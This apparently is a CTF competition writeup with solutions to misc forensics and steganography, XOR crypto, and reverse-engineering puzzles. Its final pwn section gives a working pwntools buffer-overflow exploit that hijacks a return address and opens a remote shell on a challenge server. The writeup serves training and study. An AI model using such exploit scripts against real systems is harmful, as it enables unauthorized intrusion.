Chang'an Zhanyi (长安战疫) CTF writeup

misc

Bagua Maze (八卦迷宫)

Just walk the maze.

cazy{zhanchangyangchangzhanyanghechangshanshananzhanyiyizhanyianyichanganyang}

Plain and Simple Forensics (朴实无华的取证)

python2 vol.py -f /home/ltlly/桌面/xp_sp3.raw imageinfo

--profile=WinXPSP3x86

python2 vol.py -f /home/ltlly/桌面/xp_sp3.raw pslist>1.txt

Take a look at the processes. After some probing, the notepad content turned out to be ?

```
*** Failed to import volatility.plugins.malware.threads (NameError: name 'distorm3' is not defined)
*** Failed to import volatility.plugins.mac.apihooks_kernel (ImportError: No module named distorm3)
*** Failed to import volatility.plugins.mac.check_syscall_shadow (ImportError: No module named distorm3)
*** Failed to import volatility.plugins.ssdt (NameError: name 'distorm3' is not defined)
*** Failed to import volatility.plugins.mac.apihooks (ImportError: No module named distorm3)
Offset(V) Name PID PPID Thds Hnds Sess Wow64 Start Exit
---------- -------------------- ------ ------ ------ -------- ------ ------ ------------------------------ ------------------------------
0x8214fa00 System 4 0 56 364 ------ 0
0x81cfe778 smss.exe 588 4 3 19 ------ 0 2021-12-27 00:51:12 UTC+0000
0x81b39da0 csrss.exe 636 588 12 841 0 0 2021-12-27 00:51:13 UTC+0000
0x81ffb020 winlogon.exe 668 588 23 526 0 0 2021-12-27 00:51:13 UTC+0000
0x81b3bbf0 services.exe 712 668 15 308 0 0 2021-12-27 00:51:13 UTC+0000
0x81c80478 lsass.exe 724 668 21 360 0 0 2021-12-27 00:51:13 UTC+0000
0x81b27370 vmacthlp.exe 908 712 1 25 0 0 2021-12-27 00:51:13 UTC+0000
0x81b3da70 svchost.exe 924 712 17 205 0 0 2021-12-27 00:51:13 UTC+0000
0x82076b18 svchost.exe 988 712 10 296 0 0 2021-12-27 00:51:13 UTC+0000
0x81f228b8 svchost.exe 1084 712 72 1491 0 0 2021-12-27 00:51:13 UTC+0000
0x81b11450 svchost.exe 1176 712 6 93 0 0 2021-12-27 00:51:13 UTC+0000
0x81b4eda0 Pinyin_2345Svc. 1196 712 17 367 0 0 2021-12-27 00:51:13 UTC+0000
0x81b70be8 svchost.exe 1312 712 3 103 0 0 2021-12-27 00:51:14 UTC+0000
0x81f5b440 Protect_2345Exp 1324 712 11 335 0 0 2021-12-27 00:51:14 UTC+0000
0x81f06da0 Pic_2345Svc.exe 1368 712 26 432 0 0 2021-12-27 00:51:14 UTC+0000
0x81b1c620 ZhuDongFangYu.e 1508 712 19 235 0 0 2021-12-27 00:51:14 UTC+0000
0x81bae4b0 spoolsv.exe 1764 712 10 136 0 0 2021-12-27 00:51:14 UTC+0000
0x81b1eda0 explorer.exe 1904 1820 33 980 0 0 2021-12-27 00:51:14 UTC+0000
0x81bf7748 2345PinyinCloud 2016 1904 21 390 0 0 2021-12-27 00:51:15 UTC+0000
0x81b62c20 FaceTool_2345Pi 304 2016 12 230 0 0 2021-12-27 00:51:16 UTC+0000
0x81c1a020 360tray.exe 916 1904 158 1704 0 0 2021-12-27 00:51:18 UTC+0000
0x81bdd9b8 vmtoolsd.exe 944 1904 10 345 0 0 2021-12-27 00:51:18 UTC+0000
0x81c7cc80 ctfmon.exe 932 1904 6 180 0 0 2021-12-27 00:51:18 UTC+0000
0x81b5ada0 2345PinyinUpdat 1052 1196 0 -------- 0 0 2021-12-27 00:51:18 UTC+0000 2021-12-27 00:58:08 UTC+0000
0x81d78770 TsBrowserSvr.ex 2856 712 12 217 0 0 2021-12-27 00:51:40 UTC+0000
0x81d29670 VGAuthService.e 2916 712 2 60 0 0 2021-12-27 00:51:40 UTC+0000
0x81c215c8 vmtoolsd.exe 3420 712 7 273 0 0 2021-12-27 00:51:52 UTC+0000
0x81f09750 alg.exe 3820 712 5 104 0 0 2021-12-27 00:51:53 UTC+0000
0x81a18768 wmiprvse.exe 3844 924 13 302 0 0 2021-12-27 00:51:53 UTC+0000
0x819ad580 360bdoctor.exe 2832 916 9 262 0 0 2021-12-27 01:02:55 UTC+0000
0x819a78f8 360seupdate.exe 440 2832 0 -------- 0 0 2021-12-27 01:02:55 UTC+0000 2021-12-27 01:02:56 UTC+0000
0x819b45f8 sesvc.exe 3920 2832 0 -------- 0 0 2021-12-27 01:02:56 UTC+0000 2021-12-27 01:02:56 UTC+0000
0x81c47308 svchost.exe 3488 712 5 128 0 0 2021-12-27 01:40:27 UTC+0000
0x81fd27e8 softupnotify.ex 2936 916 0 -------- 0 0 2021-12-27 01:40:40 UTC+0000 2021-12-27 01:40:40 UTC+0000
0x819b0970 mspaint.exe 3888 1904 9 258 0 0 2021-12-27 01:44:37 UTC+0000
0x81a08da0 conime.exe 3260 2124 9 183 0 0 2021-12-27 01:44:47 UTC+0000
0x81d68a50 IEXPLORE.EXE 3748 1904 21 578 0 0 2021-12-27 01:44:52 UTC+0000
0x819d6a18 wdswfsafe.exe 2136 916 4 70 0 0 2021-12-27 01:44:52 UTC+0000
0x819c98a0 softupnotify.ex 884 916 0 -------- 0 0 2021-12-27 01:44:52 UTC+0000 2021-12-27 01:44:52 UTC+0000
0x81c2b2f0 IEXPLORE.EXE 3976 3748 37 1374 0 0 2021-12-27 01:44:52 UTC+0000
0x819b23b0 softupnotify.ex 1916 916 0 -------- 0 0 2021-12-27 02:00:18 UTC+0000 2021-12-27 02:00:18 UTC+0000
0x81c33630 softupnotify.ex 972 916 0 -------- 0 0 2021-12-27 02:03:28 UTC+0000 2021-12-27 02:03:28 UTC+0000
0x81f2c7e0 notepad.exe 2976 1904 6 180 0 0 2021-12-27 02:27:06 UTC+0000
0x81c7f630 360zip.exe 3388 1904 10 366 0 0 2021-12-27 02:28:39 UTC+0000
0x81d4d020 2345PicViewer.e 3812 1904 23 378 0 0 2021-12-27 02:36:41 UTC+0000
0x81923020 taskmgr.exe 3628 668 9 188 0 0 2021-12-27 02:37:11 UTC+0000
0x81c30da0 DumpIt.exe 3300 1904 1 16 0 0 2021-12-27 02:37:38 UTC+0000
```
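One way to triage a listing like this in code, added here as an illustration and not part of the original write-up: it parses a subset of the pslist rows shown above, lists the live children of explorer.exe in start order (the programs opened from the desktop, notepad.exe among them), and reports processes whose parent PID is absent from the list. The function names are this example's own.

```python
# Subset of the pslist rows from the write-up, columns as printed there.
PSLIST = """\
Offset(V) Name PID PPID Thds Hnds Sess Wow64 Start Exit
0x8214fa00 System 4 0 56 364 ------ 0
0x81cfe778 smss.exe 588 4 3 19 ------ 0 2021-12-27 00:51:12 UTC+0000
0x81ffb020 winlogon.exe 668 588 23 526 0 0 2021-12-27 00:51:13 UTC+0000
0x81b1eda0 explorer.exe 1904 1820 33 980 0 0 2021-12-27 00:51:14 UTC+0000
0x81c1a020 360tray.exe 916 1904 158 1704 0 0 2021-12-27 00:51:18 UTC+0000
0x819b0970 mspaint.exe 3888 1904 9 258 0 0 2021-12-27 01:44:37 UTC+0000
0x81a08da0 conime.exe 3260 2124 9 183 0 0 2021-12-27 01:44:47 UTC+0000
0x81d68a50 IEXPLORE.EXE 3748 1904 21 578 0 0 2021-12-27 01:44:52 UTC+0000
0x819c98a0 softupnotify.ex 884 916 0 -------- 0 0 2021-12-27 01:44:52 UTC+0000 2021-12-27 01:44:52 UTC+0000
0x81c2b2f0 IEXPLORE.EXE 3976 3748 37 1374 0 0 2021-12-27 01:44:52 UTC+0000
0x81f2c7e0 notepad.exe 2976 1904 6 180 0 0 2021-12-27 02:27:06 UTC+0000
0x81c7f630 360zip.exe 3388 1904 10 366 0 0 2021-12-27 02:28:39 UTC+0000
0x81d4d020 2345PicViewer.e 3812 1904 23 378 0 0 2021-12-27 02:36:41 UTC+0000
0x81923020 taskmgr.exe 3628 668 9 188 0 0 2021-12-27 02:37:11 UTC+0000
0x81c30da0 DumpIt.exe 3300 1904 1 16 0 0 2021-12-27 02:37:38 UTC+0000
"""


def parse_pslist(text):
    """Parse whitespace-separated pslist rows (assumes names without spaces)."""
    procs = []
    for line in text.splitlines():
        f = line.split()
        if len(f) < 8 or not f[0].startswith("0x"):
            continue  # header, separator or "*** Failed to import" noise
        procs.append({
            "name": f[1], "pid": int(f[2]), "ppid": int(f[3]),
            "start": " ".join(f[8:10]),   # empty for System
            "exited": len(f) >= 14,       # an Exit timestamp is present
        })
    return procs


def children_of(procs, parent_name):
    """Live children of the named process, oldest first."""
    pids = {p["pid"] for p in procs if p["name"].lower() == parent_name.lower()}
    kids = [p for p in procs if p["ppid"] in pids and not p["exited"]]
    return sorted(kids, key=lambda p: p["start"])


def orphans(procs):
    """Processes whose parent PID does not appear in the listing."""
    known = {p["pid"] for p in procs}
    return [p for p in procs if p["ppid"] != 0 and p["ppid"] not in known]


if __name__ == "__main__":
    procs = parse_pslist(PSLIST)
    for p in children_of(procs, "explorer.exe"):
        print(p["start"], p["pid"], p["name"])
    print("orphans:", [(p["name"], p["ppid"]) for p in orphans(procs)])
```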

python2 vol.py -f /home/ltlly/桌面/xp_sp3.raw filescan >file.txt

Look through the files and search for flag.

```
0x0000000001b34f90      1      1 R--r-- \Device\HarddiskVolume1\Documents and Settings\Administrator\桌面\flag.zip
0x0000000001e65028      1      0 R--rw- \Device\HarddiskVolume1\Documents and Settings\Administrator\桌面\flag.png
0x00000000017ad6a8      2      0 R--rw- \Device\HarddiskVolume1\Documents and Settings\Administrator\桌面\flag.zip
0x00000000018efcb8      1      0 RW-rw- \Device\HarddiskVolume1\Documents and Settings\Administrator\Recent\flag.lnk
```

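Dump them all out.

One archive is corrupted; leave it unrepaired for now.

The other archive is simply brute-forced; the password is 20211209.

That yields an encryption script: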

```cpp
#include <string>
using std::string;

void Encrypt(string& str)
{
    for (int i = 0; i < str.length(); i++)
    {
        if (str[i] >= 'a' && str[i] <= 'w')
            str[i] += 3;
        else if (str[i] == 'x')
            str[i] = 'a';
        else if (str[i] == 'y')
            str[i] = 'b';
        else if (str[i] == 'z')
            str[i] = 'c';
        else if (str[i] == '_')
            str[i] = '|';
        str[i] -= 32;  // applied to every character, whichever branch ran
    }
}
```

```python
a = "FDCB[8LDQ?ZL00?FHUWDLQ0B?VXFFHHG?LQ?ILJKWLQJ?WKH?HSLGHPLF]"
# First pass (already run): undo the final "-= 32", giving the string below
# for x in a:
#     print(chr(ord(x) + 32), end="")
a = "fdcb{Xldq_zlPP_fhuwdlqPb_vxffhhg_lq_iljkwlqj_wkh_hslghplf}"
# Second pass: undo the shift by 3 and the x/y/z wrap-around
for x in a:
    if x == 'a':
        print("x", end="")
    elif x == 'b':
        print("y", end="")
    elif x == 'c':
        print("z", end="")
    elif x == "|":
        print("_", end="")
    elif x.islower():
        print(chr(ord(x) - 3), end="")
    else:
        print(chr(ord(x)), end="")
```

cazy{Xian_wiPP_certainPy_succeed_in_fighting_the_epidemic}

Not quite right; tweak it a little.

cazy{Xian_will_certainly_succeed_in_fighting_the_epidemic}

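Wordless Book (无字天书)

Stop hunting through the traffic. Export!

Pull it out with binwalk -e.

Convert the hex to characters; it is an archive.

Unpack it.

key.ws is Whitespace: https://vii5ard.github.io/whitespace/

flag.txt is SNOW.

Go Xi'an (西安加油)

Export everything!

hint.txt decodes as base32: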

9403.png is 0
8086.png is 1
7301.png is 2
7422.png is 3
3978.png is 4
8266.png is 5
7683.png is 6
5410.png is 7
4365.png is 8
2426.png is 9
9056.png is 10
3205.png is 11
6361.png is 12
9167.png is 13
3195.png is 14
5852.png is 15
9280.png is 16
9702.png is 17
8424.png is 18
1675.png is 19
3014.png is 20
7986.png is 21
8432.png is 22
7139.png is 23
4655.png is 24
7258.png is 25
3565.png is 26
5444.png is 27
7384.png is 28
2003.png is 29
8688.png is 30
5956.png is 31
3509.png is 32
9027.png is 33
1905.png is 34
6085.png is 35
7406.png is 36
1650.png is 37
8602.png is 38
9377.png is 39
1323.png is 40
7321.png is 41
2747.png is 42
7125.png is 43
1220.png is 44
7079.png is 45
5172.png is 46
5070.png is 47

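secret.txt is base64; decoding it gives an archive, which is then unpacked.

Then stitch the pieces together.

binary

Change the extension to .class and open it in ij.

Take the array: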

a=[77, 68, 65, 119, 77, 68, 65, 119, 77, 68, 69, 119, 77, 84, 69, 120, 77, 68, 65, 119, 77, 68, 65, 119, 77, 68, 65, 120, 77, 84, 69, 120, 77, 84, 69, 119, 77, 84, 69, 120, 77, 68, 65, 119, 77, 68, 65, 119, 77, 70, 120, 117, 77, 68, 69, 120, 77, 84, 69, 120, 77, 68, 69, 119, 77, 84, 69, 119, 77, 84, 65, 120, 77, 68, 69, 120, 77, 84, 69, 120, 77, 68, 65, 119, 77, 84, 69, 120, 77, 68, 69, 120, 77, 68, 69, 120, 77, 84, 69, 120, 77, 70, 120, 117, 77, 68, 69, 119, 77, 68, 65, 120, 77, 68, 69, 119, 77, 68, 65, 119, 77, 84, 69, 120, 77, 84, 65, 119, 77, 68, 69, 120, 77, 84, 65, 120, 77, 68, 69, 120, 77, 68, 69, 120, 77, 68, 69, 119, 77, 68, 65, 120, 77, 70, 120, 117, 77, 68, 69, 119, 77, 68, 65, 120, 77, 68, 69, 120, 77, 68, 65, 119, 77, 68, 65, 120, 77, 84, 65, 119, 77, 68, 69, 120, 77, 84, 65, 119, 77, 68, 65, 119, 77, 84, 65, 120, 77, 68, 69, 119, 77, 68, 65, 120, 77, 70, 120, 117, 77, 68, 69, 119, 77, 68, 65, 120, 77, 68, 69, 120, 77, 84, 65, 120, 77, 84, 65, 120, 77, 84, 65, 119, 77, 84, 69, 119, 77, 84, 69, 119, 77, 84, 65, 120, 77, 84, 69, 120, 77, 68, 69, 119, 77, 68, 65, 120, 77, 70, 120, 117, 77, 68, 69, 120, 77, 84, 69, 120, 77, 68, 69, 119, 77, 84, 69, 120, 77, 68, 69, 119, 77, 68, 65, 119, 77, 68, 65, 119, 77, 84, 65, 119, 77, 84, 65, 119, 77, 68, 65, 120, 77, 68, 69, 120, 77, 84, 69, 120, 77, 70, 120, 117, 77, 68, 65, 119, 77, 68, 65, 119, 77, 68, 69, 119, 77, 84, 65, 120, 77, 68, 69, 119, 77, 84, 65, 120, 77, 68, 69, 119, 77, 84, 65, 120, 77, 68, 69, 119, 77, 84, 65, 120, 77, 68, 65, 119, 77, 68, 65, 119, 77, 70, 120, 117, 77, 84, 69, 120, 77, 84, 69, 120, 77, 84, 69, 119, 77, 68, 69, 119, 77, 68, 65, 119, 77, 68, 65, 119, 77, 68, 69, 119, 77, 68, 69, 120, 77, 68, 65, 120, 77, 84, 69, 120, 77, 84, 69, 120, 77, 84, 69, 120, 77, 86, 120, 117, 77, 84, 69, 119, 77, 68, 65, 120, 77, 68, 69, 119, 77, 84, 65, 120, 77, 68, 65, 119, 77, 68, 69, 119, 77, 84, 69, 120, 77, 84, 69, 120, 77, 68, 69, 119, 77, 68, 65, 119, 77, 68, 65, 120, 77, 84, 65, 119, 77, 70, 120, 
117, 77, 68, 69, 119, 77, 84, 69, 119, 77, 84, 65, 119, 77, 68, 69, 120, 77, 68, 65, 120, 77, 68, 65, 120, 77, 68, 65, 119, 77, 68, 69, 119, 77, 68, 69, 120, 77, 68, 69, 119, 77, 84, 65, 120, 77, 84, 69, 119, 77, 86, 120, 117, 77, 84, 65, 120, 77, 84, 65, 119, 77, 68, 65, 119, 77, 84, 65, 119, 77, 84, 69, 120, 77, 84, 65, 119, 77, 84, 69, 119, 77, 68, 65, 120, 77, 84, 65, 120, 77, 68, 65, 119, 77, 68, 65, 120, 77, 68, 65, 120, 77, 70, 120, 117, 77, 84, 69, 120, 77, 68, 69, 120, 77, 84, 69, 120, 77, 84, 69, 120, 77, 68, 65, 120, 77, 68, 69, 119, 77, 84, 69, 119, 77, 84, 65, 119, 77, 68, 69, 120, 77, 68, 69, 119, 77, 84, 65, 120, 77, 84, 69, 119, 77, 70, 120, 117, 77, 84, 65, 120, 77, 68, 69, 120, 77, 68, 65, 119, 77, 84, 69, 120, 77, 68, 65, 119, 77, 68, 65, 119, 77, 68, 69, 120, 77, 68, 69, 119, 77, 68, 65, 119, 77, 68, 65, 119, 77, 68, 65, 119, 77, 68, 65, 120, 77, 70, 120, 117, 77, 68, 69, 120, 77, 68, 69, 119, 77, 84, 65, 119, 77, 84, 65, 119, 77, 68, 69, 119, 77, 68, 65, 120, 77, 84, 65, 120, 77, 84, 69, 119, 77, 84, 65, 120, 77, 84, 69, 119, 77, 84, 69, 120, 77, 84, 69, 119, 77, 86, 120, 117, 77, 68, 65, 120, 77, 68, 69, 119, 77, 68, 69, 119, 77, 68, 69, 120, 77, 84, 69, 120, 77, 84, 69, 119, 77, 84, 69, 120, 77, 68, 65, 119, 77, 68, 69, 120, 77, 68, 65, 120, 77, 68, 69, 119, 77, 68, 65, 120, 77, 70, 120, 117, 77, 68, 65, 120, 77, 68, 65, 119, 77, 84, 69, 119, 77, 84, 69, 120, 77, 68, 69, 120, 77, 68, 69, 120, 77, 68, 65, 120, 77, 84, 65, 119, 77, 84, 69, 119, 77, 68, 69, 120, 77, 68, 65, 120, 77, 84, 69, 119, 77, 86, 120, 117, 77, 84, 69, 120, 77, 68, 69, 119, 77, 68, 69, 120, 77, 68, 65, 119, 77, 84, 69, 120, 77, 84, 69, 120, 77, 84, 65, 120, 77, 84, 65, 120, 77, 68, 65, 120, 77, 84, 65, 119, 77, 68, 65, 119, 77, 68, 65, 120, 77, 70, 120, 117, 77, 68, 65, 119, 77, 68, 69, 120, 77, 84, 65, 120, 77, 68, 69, 119, 77, 68, 65, 120, 77, 84, 69, 119, 77, 68, 65, 119, 77, 68, 69, 119, 77, 84, 69, 119, 77, 84, 69, 120, 77, 84, 69, 120, 77, 68, 69, 120, 77, 86, 120, 
117, 77, 84, 69, 119, 77, 84, 69, 119, 77, 68, 69, 120, 77, 68, 69, 119, 77, 84, 69, 119, 77, 84, 65, 119, 77, 84, 69, 119, 77, 68, 65, 120, 77, 68, 69, 119, 77, 68, 69, 120, 77, 68, 65, 119, 77, 68, 69, 119, 77, 70, 120, 117, 77, 68, 69, 119, 77, 84, 65, 119, 77, 84, 65, 119, 77, 84, 69, 120, 77, 84, 65, 119, 77, 84, 65, 119, 77, 68, 65, 119, 77, 84, 65, 119, 77, 84, 69, 120, 77, 68, 65, 120, 77, 68, 65, 120, 77, 68, 69, 120, 77, 86, 120, 117, 77, 68, 69, 119, 77, 84, 65, 120, 77, 68, 65, 120, 77, 84, 65, 119, 77, 68, 69, 120, 77, 84, 65, 119, 77, 68, 69, 120, 77, 68, 65, 120, 77, 68, 65, 119, 77, 68, 65, 120, 77, 68, 69, 119, 77, 84, 65, 119, 77, 70, 120, 117, 77, 84, 65, 119, 77, 84, 69, 119, 77, 84, 69, 120, 77, 84, 69, 119, 77, 84, 69, 120, 77, 68, 69, 120, 77, 68, 65, 120, 77, 68, 65, 120, 77, 84, 69, 120, 77, 84, 69, 119, 77, 84, 65, 120, 77, 84, 69, 119, 77, 86, 120, 117, 77, 84, 69, 119, 77, 84, 69, 119, 77, 68, 65, 120, 77, 68, 69, 120, 77, 84, 65, 119, 77, 68, 65, 119, 77, 68, 69, 119, 77, 84, 69, 120, 77, 68, 69, 120, 77, 68, 65, 119, 77, 84, 65, 120, 77, 84, 65, 120, 77, 70, 120, 117, 77, 68, 65, 120, 77, 84, 65, 119, 77, 84, 65, 119, 77, 68, 69, 120, 77, 84, 69, 119, 77, 84, 69, 119, 77, 68, 65, 120, 77, 84, 69, 120, 77, 68, 69, 119, 77, 68, 69, 119, 77, 68, 69, 120, 77, 84, 69, 119, 77, 86, 120, 117, 77, 68, 69, 119, 77, 84, 65, 119, 77, 68, 65, 119, 77, 84, 69, 120, 77, 68, 69, 119, 77, 84, 69, 120, 77, 68, 69, 120, 77, 68, 69, 119, 77, 84, 69, 120, 77, 84, 69, 120, 77, 68, 69, 119, 77, 68, 65, 120, 77, 70, 120, 117, 77, 68, 69, 119, 77, 84, 65, 120, 77, 84, 65, 120, 77, 84, 65, 119, 77, 84, 65, 119, 77, 84, 65, 119, 77, 68, 65, 119, 77, 68, 69, 120, 77, 68, 69, 119, 77, 68, 65, 120, 77, 68, 65, 120, 77, 84, 69, 120, 77, 86, 120, 117, 77, 68, 69, 120, 77, 68, 69, 119, 77, 68, 65, 120, 77, 68, 65, 119, 77, 84, 69, 120, 77, 68, 65, 120, 77, 68, 69, 120, 77, 68, 65, 120, 77, 84, 65, 120, 77, 84, 69, 120, 77, 84, 65, 119, 77, 84, 69, 119, 77, 70, 120, 
117, 77, 68, 69, 120, 77, 84, 65, 119, 77, 84, 69, 120, 77, 84, 69, 119, 77, 68, 65, 119, 77, 68, 65, 120, 77, 68, 69, 120, 77, 68, 69, 120, 77, 68, 69, 120, 77, 84, 65, 119, 77, 84, 69, 120, 77, 84, 69, 119, 77, 70, 120, 117, 77, 68, 69, 119, 77, 68, 69, 120, 77, 68, 65, 120, 77, 68, 69, 120, 77, 68, 65, 120, 77, 68, 69, 119, 77, 68, 65, 120, 77, 68, 69, 120, 77, 84, 65, 120, 77, 84, 65, 119, 77, 68, 65, 119, 77, 68, 65, 119, 77, 70, 120, 117, 77, 84, 69, 120, 77, 84, 69, 120, 77, 84, 69, 119, 77, 84, 65, 120, 77, 84, 65, 119, 77, 84, 69, 120, 77, 68, 65, 120, 77, 84, 69, 119, 77, 68, 69, 119, 77, 84, 65, 120, 77, 84, 69, 119, 77, 84, 65, 120, 77, 86, 120, 117, 77, 68, 65, 119, 77, 68, 65, 119, 77, 68, 69, 120, 77, 84, 65, 119, 77, 68, 69, 120, 77, 84, 65, 120, 77, 84, 65, 120, 77, 68, 69, 120, 77, 68, 65, 119, 77, 84, 65, 120, 77, 68, 69, 119, 77, 68, 69, 119, 77, 70, 120, 117, 77, 68, 69, 120, 77, 84, 69, 120, 77, 68, 69, 120, 77, 84, 65, 119, 77, 84, 69, 119, 77, 84, 65, 120, 77, 68, 69, 120, 77, 68, 69, 119, 77, 84, 69, 119, 77, 68, 65, 120, 77, 84, 69, 119, 77, 84, 69, 120, 77, 86, 120, 117, 77, 68, 69, 119, 77, 68, 65, 120, 77, 68, 69, 119, 77, 68, 69, 120, 77, 68, 65, 119, 77, 68, 69, 120, 77, 68, 65, 120, 77, 84, 65, 120, 77, 68, 65, 119, 77, 68, 65, 119, 77, 68, 65, 119, 77, 68, 65, 120, 77, 70, 120, 117, 77, 68, 69, 119, 77, 68, 65, 120, 77, 68, 69, 119, 77, 84, 69, 120, 77, 84, 69, 119, 77, 84, 69, 119, 77, 68, 65, 120, 77, 84, 69, 120, 77, 84, 69, 120, 77, 84, 69, 120, 77, 68, 69, 119, 77, 68, 69, 120, 77, 86, 120, 117, 77, 68, 69, 119, 77, 68, 65, 120, 77, 68, 69, 119, 77, 84, 69, 119, 77, 84, 69, 120, 77, 84, 69, 120, 77, 84, 69, 119, 77, 68, 65, 119, 77, 68, 65, 120, 77, 68, 69, 119, 77, 84, 65, 120, 77, 68, 69, 120, 77, 70, 120, 117, 77, 68, 69, 120, 77, 84, 69, 120, 77, 68, 69, 120, 77, 84, 69, 120, 77, 84, 65, 119, 77, 68, 69, 119, 77, 84, 69, 119, 77, 84, 65, 119, 77, 84, 69, 120, 77, 84, 65, 119, 77, 68, 69, 120, 77, 68, 69, 120, 77, 70, 120, 
117, 77, 68, 65, 119, 77, 68, 65, 119, 77, 68, 69, 120, 77, 84, 69, 120, 77, 84, 65, 120, 77, 84, 69, 120, 77, 68, 69, 120, 77, 68, 65, 119, 77, 68, 65, 119, 77, 68, 69, 119, 77, 68, 65, 120, 77, 84, 65, 119, 77, 65, 61, 61]
for x in a:
    print(chr(x), end="")

This prints base64; decoding it gives a pile of 0s and 1s, thoughtfully with the line breaks already marked.

```python
from PIL import Image

x = 37
y = 37
im = Image.new('RGB', (x, y))
white = (255, 255, 255)
black = (0, 0, 0)
# text file holding the decoded rows of 0s and 1s, one row per line
with open('新建文本文档 (2).txt') as f:
    for i in range(x):
        ff = f.readline()
        for j in range(y):
            if ff[j] == '1':
                im.putpixel((i, j), black)
            else:
                im.putpixel((i, j), white)
im.save("1.jpg")
```

Draw the QR code and scan it.

flag{932b2c0070e4897ea7df0190dbf36ece}

crypto

I could only solve one, what can I say.

no_cry_no_can

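```python
from Cryptodome.Util.number import *
# from secret import flag, key
flag = "cazy{aaaaaa}".encode()
key = "bbbbb".encode()
assert len(key) <= 5
assert flag[:5] == b'cazy{'


def can_encrypt(flag, key):
    # repeat the key until it covers the flag, then XOR byte by byte
    block_len = len(flag) // len(key) + 1
    new_key = key * block_len
    return bytes([i ^ j for i, j in zip(flag, new_key)])


c = can_encrypt(flag, key)
print(c)  # b'<pH\x86\x1a&"m\xce\x12\x00pm\x97U1uA\xcf\x0c:NP\xcf\x18~l'
```

A very simple encryption.

The first five bytes of the flag are fixed: cazy{

The key is at most five bytes, and the flag is XORed with the key byte by byte.

So first XOR the ciphertext with cazy{ to recover the key,

then XOR back with that key to recover the flag.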

```python
d = b'<pH\x86\x1a&"m\xce\x12\x00pm\x97U1uA\xcf\x0c:NP\xcf\x18~l'

# XOR the ciphertext with the known prefix
for index in range(len(d)):
    print(hex(d[index] ^ b"cazy{"[index % 5]), end=",")
print()

# take the first five values as the key
for index in range(len(d)):
    print(chr(d[index] ^ b"\x5f\x11\x32\xff\x61"[index % 5]), end="")
```

cazy{y3_1s_a_h4nds0me_b0y!}
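The known-plaintext recovery described above, as an added example that is not the author's script. It goes one step beyond the write-up: since the challenge only asserts `len(key) <= 5`, it tests every key length from 1 to 5 against the recovered keystream prefix and keeps the candidates whose decryption is printable and ends in `}`. The function names are this example's own.

```python
from itertools import cycle

# Ciphertext printed by the challenge script; the flag format fixes the prefix.
CIPHERTEXT = b'<pH\x86\x1a&"m\xce\x12\x00pm\x97U1uA\xcf\x0c:NP\xcf\x18~l'
KNOWN_PREFIX = b"cazy{"
MAX_KEY_LEN = 5  # from `assert len(key) <= 5`


def xor_repeat(data, key):
    """XOR data with the key repeated to length (encrypts and decrypts alike)."""
    return bytes(d ^ k for d, k in zip(data, cycle(key)))


def candidate_keys(ct, known=KNOWN_PREFIX, max_len=MAX_KEY_LEN):
    """Keys of each length whose repetition reproduces the keystream prefix."""
    stream = bytes(c ^ p for c, p in zip(ct, known))
    keys = []
    for n in range(1, min(max_len, len(stream)) + 1):
        key = stream[:n]
        if all(stream[i] == key[i % n] for i in range(len(stream))):
            keys.append(key)
    return keys


def solve(ct):
    """Return (key, plaintext) pairs whose plaintext looks like a flag."""
    hits = []
    for key in candidate_keys(ct):
        pt = xor_repeat(ct, key)
        if pt.endswith(b"}") and all(0x20 <= b < 0x7F for b in pt):
            hits.append((key, pt))
    return hits


if __name__ == "__main__":
    for key, pt in solve(CIPHERTEXT):
        print(key.hex(), pt.decode())
```

With a key shorter than the known prefix, the five-byte keystream prefix is also a candidate; the plausibility filter on the decrypted text is what separates the two.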

RE!

combat_slogan

Unpack, take main.class, and open it in ij.

```python
d = "Jr_j11y_s1tug_g0_raq_g0_raq_pnml"
# ROT13: letters in the first half of the alphabet move forward 13, the rest move back 13
for x in d:
    if ord(x) >= ord('a') and ord(x) <= ord('m'):
        print(chr(ord(x) + 13), end="")
    elif ord(x) >= ord('A') and ord(x) <= ord('M'):
        print(chr(ord(x) + 13), end="")
    elif ord(x) >= ord('n') and ord(x) <= ord('z'):
        print(chr(ord(x) - 13), end="")
    elif ord(x) >= ord('N') and ord(x) <= ord('Z'):
        print(chr(ord(x) - 13), end="")
    else:
        print(x, end="")
```

We_w11l_f1ght_t0_end_t0_end_cazy

cute_dog

ida

Base64 at a glance: Zmxh is fla

flag{Ch1na_yyds_cazy}

hellopy

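Decompile the pyc with an online decompiler.

The decompiled output will not run, so just read it by hand: two functions run alternately, one XORs with the index and the other XORs with the next element.

Encryption runs from back to front, so decryption runs from front to back.

```python
a = [44, 100, 3, 50, 106, 90, 5, 102, 10, 112]
for index in range(len(a) - 1):
    if index % 2:
        a[index] = a[index] ^ index
    else:
        # a[index + 1] is still encrypted at this point
        a[index] = a[index] ^ a[index + 1]
print(a)
for x in a:
    print(chr(x), end="")
```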

He110_cazp

The last element needs one more XOR; I don't feel like changing the script.

So it is

He110_cazy
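A decoder that also handles the final element, with the matching encoder, as an added example that is not the author's script or the challenge's code. The encoder is reconstructed from the decoding rule described above, and leaving an even-indexed final element unchanged is an assumption of this example.

```python
CIPHER = [44, 100, 3, 50, 106, 90, 5, 102, 10, 112]  # array from the write-up


def decode(cipher):
    """Front to back: odd slots XOR their index, even slots XOR the next value."""
    out = list(cipher)
    last = len(out) - 1
    for i in range(len(out)):
        if i % 2:
            out[i] ^= i
        elif i < last:
            out[i] ^= out[i + 1]  # out[i + 1] has not been decoded yet
        # assumption: an even-indexed final element has no neighbour, left as is
    return "".join(chr(v) for v in out)


def encode(text):
    """Inverse of decode(), back to front (reconstructed, not the original code)."""
    out = [ord(ch) for ch in text]
    last = len(out) - 1
    for i in range(last, -1, -1):
        if i % 2:
            out[i] ^= i
        elif i < last:
            out[i] ^= out[i + 1]  # out[i + 1] is already encoded
    return out


if __name__ == "__main__":
    print(decode(CIPHER))
```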

pwn

pwn1

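```python
from pwn import *

r = remote('113.201.14.253', 16088)
shell_addr = 0x8048540
# the first line received is parsed as a hex address after skipping its first two characters
buf_addr = int(r.recvuntil(b'\n', drop=True)[2:], 16)
# 0x38 - 0x4 bytes of padding, then an address computed from the leak, then shell_addr
payload = b'a' * (0x38 - 0x4) + p32(buf_addr + 0x38 + 4) + p32(shell_addr)
r.sendline(payload)
r.interactive()
```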
